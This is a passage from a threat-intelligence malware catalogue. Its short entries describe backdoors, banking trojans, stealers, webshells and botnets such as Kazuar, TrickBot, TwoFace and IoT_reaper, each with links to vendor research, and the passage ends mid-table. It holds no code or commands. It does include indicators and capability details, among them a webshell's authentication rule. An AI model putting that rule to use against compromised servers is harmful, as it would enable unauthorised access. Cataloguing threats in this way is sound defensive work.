<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2744. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-117A">https://www.us-cert.gov/ncas/alerts/TA17-117A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kazuar"><a class="anchor" href="#_kazuar"></a><a class="link" href="#_kazuar">Kazuar</a></h3>
<div class="paragraph">
<p>Kazuar is a fully featured backdoor written using the .NET Framework and obfuscated using the open source packer called ConfuserEx. Unit 42 researchers have uncovered a backdoor Trojan used in an espionage campaign. The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojans capabilities. During our analysis of this malware we uncovered interesting code paths and other artifacts that may indicate a Mac or Unix variant of this same tool also exists. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver. We suspect the Kazuar tool may be linked to the Turla threat actor group (also known as Uroburos and Snake), who have been reported to have compromised embassies, defense contractors, educational institutions, and research organizations across the globe. A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005. If the hypothesis is correct and the Turla threat group is using Kazuar, we believe they may be using it as a replacement for Carbon and its derivatives. Of the myriad of tools observed in use by Turla Carbon and its variants were typically deployed as a second stage backdoor within targeted environments and we believe Kazuar may now hold a similar role for Turla operations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2745. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/">http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trick_bot"><a class="anchor" href="#_trick_bot"></a><a class="link" href="#_trick_bot">Trick Bot</a></h3>
<div class="paragraph">
<p>Many links indicate, that this bot is another product of the people previously involved in Dyreza. It seems to be rewritten from scratch however, it contains many similar features and solutions to those we encountered analyzing Dyreza (read more).</p>
</div>
<div class="paragraph">
<p>Trick Bot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TrickBot</p>
</li>
<li>
<p>TrickLoader</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2746. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/">https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fraudwatchinternational.com/malware/trickbot-malware-works">https://blog.fraudwatchinternational.com/malware/trickbot-malware-works</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/trickbot-is-hand-picking-private-banks-for-targets-with-redirection-attacks-in-tow/">https://securityintelligence.com/trickbot-is-hand-picking-private-banks-for-targets-with-redirection-attacks-in-tow/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-gets-screenlocker-component/">https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-gets-screenlocker-component/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hackshit"><a class="anchor" href="#_hackshit"></a><a class="link" href="#_hackshit">Hackshit</a></h3>
<div class="paragraph">
<p>Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform named Hackshit, that records the credentials of the phished bait victims. The phished bait pages are packaged with base64 encoding and served from secure (HTTPS) websites with “.moe” top level domain (TLD) to evade traditional scanners. “.moe” TLD is intended for the purpose of The marketing of products or services deemed. The victims credentials are sent to the Hackshit PhaaS platform via websockets. The Netskope Active Platform can proactively protect customers by creating custom applications and a policy to block all the activities related to Hackshit PhaaS.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2747. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://resources.netskope.com/h/i/352356475-phishing-as-a-service-phishing-revamped">https://resources.netskope.com/h/i/352356475-phishing-as-a-service-phishing-revamped</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moneygram_adwind"><a class="anchor" href="#_moneygram_adwind"></a><a class="link" href="#_moneygram_adwind">Moneygram Adwind</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2748. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://myonlinesecurity.co.uk/new-guidelines-from-moneygram-malspam-delivers-a-brand-new-java-adwind-version/">https://myonlinesecurity.co.uk/new-guidelines-from-moneygram-malspam-delivers-a-brand-new-java-adwind-version/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_banload"><a class="anchor" href="#_banload"></a><a class="link" href="#_banload">Banload</a></h3>
<div class="literalblock">
<div class="content">
<pre>Banload has been around since the last decade. This malware generally arrives on a victims system through a spam email containing an archived file or bundled software as an attachment. In a few cases, this malware may also be dropped by other malware or a drive-by download. When executed, Banload downloads other malware, often banking Trojans, on the victims system to carry out further infections.</pre>
</div>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2749. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/03/banload-malware-affecting-brazil-exhibits-unusually-complex-infection-process/">https://researchcenter.paloaltonetworks.com/2016/03/banload-malware-affecting-brazil-exhibits-unusually-complex-infection-process/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/banload">https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/banload</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/banload-limits-targets-via-security-plugin/">http://blog.trendmicro.com/trendlabs-security-intelligence/banload-limits-targets-via-security-plugin/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securingtomorrow.mcafee.com/mcafee-labs/banload-trojan-targets-brazilians-with-malware-downloads/">https://securingtomorrow.mcafee.com/mcafee-labs/banload-trojan-targets-brazilians-with-malware-downloads/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smoke_loader"><a class="anchor" href="#_smoke_loader"></a><a class="link" href="#_smoke_loader">Smoke Loader</a></h3>
<div class="paragraph">
<p>This small application is used to download other malware. What makes the bot interesting are various tricks that it uses for deception and self protection.</p>
</div>
<div class="paragraph">
<p>Smoke Loader is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dofoil</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2750. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/">https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lockpos"><a class="anchor" href="#_lockpos"></a><a class="link" href="#_lockpos">LockPoS</a></h3>
<div class="paragraph">
<p>The analyzed sample has a recent compilation date (2017-06-24) and is available on VirusTotal. It starts out by resolving several Windows functions using API hashing (CRC32 is used as the hashing function).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2751. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/">https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fadok"><a class="anchor" href="#_fadok"></a><a class="link" href="#_fadok">Fadok</a></h3>
<div class="paragraph">
<p>Win.Worm.Fadok drops several files. %AppData%\RAC\mls.exe or %AppData%\RAC\svcsc.exe are instances of the malware which are auto-started when Windows starts. Further, the worm drops and opens a Word document. It connects to the domain wxanalytics[.]ru.</p>
</div>
<div class="paragraph">
<p>Fadok is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Win32/Fadok</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2752. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm%3AWin32%2FFadok.A">https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm%3AWin32%2FFadok.A</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/06/threat-roundup-0602-0609.html">http://blog.talosintelligence.com/2017/06/threat-roundup-0602-0609.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_loki_bot"><a class="anchor" href="#_loki_bot"></a><a class="link" href="#_loki_bot">Loki Bot</a></h3>
<div class="paragraph">
<p>Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2753. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://phishme.com/loki-bot-malware/">https://phishme.com/loki-bot-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_konni_2"><a class="anchor" href="#_konni_2"></a><a class="link" href="#_konni_2">KONNI</a></h3>
<div class="paragraph">
<p>Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI.
Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim&#8217;s machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time. In this article, we will analyse this evolution:</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2754. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html">http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spydealer"><a class="anchor" href="#_spydealer"></a><a class="link" href="#_spydealer">SpyDealer</a></h3>
<div class="paragraph">
<p>Recently, Palo Alto Networks researchers discovered an advanced Android malware weve named “SpyDealer” which exfiltrates private data from more than 40 apps and steals sensitive messages from communication apps by abusing the Android accessibility service feature. SpyDealer uses exploits from a commercial rooting app to gain root privilege, which enables the subsequent data theft.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2755. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cowersnail"><a class="anchor" href="#_cowersnail"></a><a class="link" href="#_cowersnail">CowerSnail</a></h3>
<div class="paragraph">
<p>CowerSnail was compiled using Qt and linked with various libraries. This framework provides benefits such as cross-platform capability and transferability of the source code between different operating systems.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2756. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/cowersnail-from-the-creators-of-sambacry/79087/">https://securelist.com/cowersnail-from-the-creators-of-sambacry/79087/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_svpeng_2"><a class="anchor" href="#_svpeng_2"></a><a class="link" href="#_svpeng_2">Svpeng</a></h3>
<div class="paragraph">
<p>In mid-July 2017, we found a new modification of the well-known mobile banking malware family Svpeng Trojan-Banker.AndroidOS.Svpeng.ae. In this modification, the cybercriminals have added new functionality: it now also works as a keylogger, stealing entered text through the use of accessibility services.</p>
</div>
<div class="paragraph">
<p>Svpeng is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>trojan-banker.androidos.svpeng.ae</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2757. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/">https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_twoface"><a class="anchor" href="#_twoface"></a><a class="link" href="#_twoface">TwoFace</a></h3>
<div class="paragraph">
<p>While investigating a recent security incident, Unit 42 found a webshell that we believe was used by the threat actor to remotely access the network of a targeted Middle Eastern organization. The construction of the webshell was interesting by itself, as it was actually two separate webshells: an initial webshell that was responsible for saving and loading the second fully functional webshell. It is this second webshell that enabled the threat actor to run a variety of commands on the compromised server. Due to these two layers, we use the name TwoFace to track this webshell.
During our analysis, we extracted the commands executed by the TwoFace webshell from the server logs on the compromised server. Our analysis shows that the commands issued by the threat actor date back to June 2016; this suggests that the actor had access to this shell for almost an entire year. The commands issued show the actor was interested in gathering credentials from the compromised server using the Mimikatz tool. We also saw the attacker using the TwoFace webshell to move laterally through the network by copying itself and other webshells to other servers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2758. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_intrudingdivisor"><a class="anchor" href="#_intrudingdivisor"></a><a class="link" href="#_intrudingdivisor">IntrudingDivisor</a></h3>
<div class="paragraph">
<p>Like TwoFace, the IntrudingDivisor webshell requires the threat actor to authenticate before issuing commands. To authenticate, the actor must provide two pieces of information, first an integer that is divisible by 5473 and a string whose MD5 hash is “9A26A0E7B88940DAA84FC4D5E6C61AD0”. Upon successful authentication, the webshell has a command handler that uses integers within the request to determine the command to execute - To complete</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2759. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_js_powmet"><a class="anchor" href="#_js_powmet"></a><a class="link" href="#_js_powmet">JS_POWMET</a></h3>
<div class="paragraph">
<p>Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET (Detected by Trend Micro as JS_POWMET.DE), which arrives via an autostart registry procedure. By utilizing a completely fileless infection chain, the malware will be more difficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2760. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/">http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_enginebox_malware"><a class="anchor" href="#_enginebox_malware"></a><a class="link" href="#_enginebox_malware">EngineBox Malware</a></h3>
<div class="paragraph">
<p>The main malware capabilities include a privilege escalation attempt using MS16032 exploitation; a HTTP Proxy to intercept banking transactions; a backdoor to make it possible for the attacker to issue arbitrary remote commands and a C&amp;C through a IRC channel. As it&#8217;s being identified as a Generic Trojan by most of VirusTotal (VT) engines, let s name it EngineBox— the core malware class I saw after reverse engineering it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2761. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://isc.sans.edu/diary/22736">https://isc.sans.edu/diary/22736</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_joao"><a class="anchor" href="#_joao"></a><a class="link" href="#_joao">Joao</a></h3>
<div class="paragraph">
<p>Spread via hacked Aeria games offered on unofficial websites, the modular malware can download and install virtually any other malicious code on the victims computer. To spread their malware, the attackers behind Joao have misused massively-multiplayer online role-playing games (MMORPGs) originally published by Aeria Games. At the time of writing this article, the Joao downloader was being distributed via the anime-themed MMORPG Grand Fantasia offered on gf.ignitgames[.]to.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2762. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/">https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fireball"><a class="anchor" href="#_fireball"></a><a class="link" href="#_fireball">Fireball</a></h3>
<div class="paragraph">
<p>Upon execution, Fireball installs a browser hijacker as well as any number of adware programs. Several different sources have linked different indicators of compromise (IOCs) and varied payloads, but a few details remain the same.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2763. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/en_us/blog/threat-spotlight-is-fireball-adware-or-malware.html">https://www.cylance.com/en_us/blog/threat-spotlight-is-fireball-adware-or-malware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shadowpad"><a class="anchor" href="#_shadowpad"></a><a class="link" href="#_shadowpad">ShadowPad</a></h3>
<div class="paragraph">
<p>ShadowPad is a modular cyber-attack platform that attackers deploy in victim networks to gain flexible remote control capabilities. The platform is designed to run in two stages. The first stage is a shellcode that was embedded in a legitimate nssock2.dll used by Xshell, Xmanager and other software packages produced by NetSarang. This stage is responsible for connecting to “validation” command and control (C&amp;C) servers and getting configuration information including the location of the real C&amp;C server, which may be unique per victim. The second stage acts as an orchestrator for five main modules responsible for C&amp;C communication, working with the DNS protocol, loading and injecting additional plugins into the memory of other processes.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2764. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf">https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_iot_reaper"><a class="anchor" href="#_iot_reaper"></a><a class="link" href="#_iot_reaper">IoT_reaper</a></h3>
<div class="paragraph">
<p>IoT_reaper is fairly large now and is actively expanding. For example, there are multiple C2s we are tracking, the most recently data (October 19) from just one C2 shows the number of unique active bot IP address is more than 10k per day. While at the same time, there are millions of potential vulnerable device IPs being queued into the c2 system waiting to be processed by an automatic loader that injects malicious code to the devices to expand the size of the botnet.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2765. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/">http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_formbook"><a class="anchor" href="#_formbook"></a><a class="link" href="#_formbook">FormBook</a></h3>
<div class="paragraph">
<p>FormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2766. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html">https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/">https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dimnie"><a class="anchor" href="#_dimnie"></a><a class="link" href="#_dimnie">Dimnie</a></h3>
<div class="paragraph">
<p>Dimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for several years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control mechanisms. The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2767. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/">https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_alma_communicator"><a class="anchor" href="#_alma_communicator"></a><a class="link" href="#_alma_communicator">ALMA Communicator</a></h3>
<div class="paragraph">
<p>The ALMA Communicator Trojan is a backdoor Trojan that uses DNS tunneling exclusively to receive commands from the adversary and to exfiltrate data. This Trojan specifically reads in a configuration from the cfg file that was initially created by the Clayslide delivery document. ALMA does not have an internal configuration, so the Trojan does not function without the cfg file created by the delivery document.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2768. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/">https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_silence"><a class="anchor" href="#_silence"></a><a class="link" href="#_silence">Silence</a></h3>
<div class="paragraph">
<p>In September 2017, we discovered a new targeted attack on financial institutions. Victims are mostly Russian banks but we also found infected organizations in Malaysia and Armenia. The attackers were using a known but still very effective technique for cybercriminals looking to make money: gaining persistent access to an internal banking network for a long period of time, making video recordings of the day to day activity on bank employees PCs, learning how things works in their target banks, what software is being used, and then using that knowledge to steal as much money as possible when ready.
We saw that technique before in Carbanak, and other similar cases worldwide. The infection vector is a spear-phishing email with a malicious attachment. An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2769. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/the-silence/83009/">https://securelist.com/the-silence/83009/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_volgmer"><a class="anchor" href="#_volgmer"></a><a class="link" href="#_volgmer">Volgmer</a></h3>
<div class="paragraph">
<p>Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries. It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2770. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-318B">https://www.us-cert.gov/ncas/alerts/TA17-318B</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nymaim"><a class="anchor" href="#_nymaim"></a><a class="link" href="#_nymaim">Nymaim</a></h3>
<div class="paragraph">
<p>Nymaim is a 2-year-old strain of malware most closely associated with ransomware. We have seen recent attacks spreading it using an established email marketing service provider to avoid blacklists and detection tools. But instead of ransomware, the malware is now being used to distribute banking Trojans</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2771. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
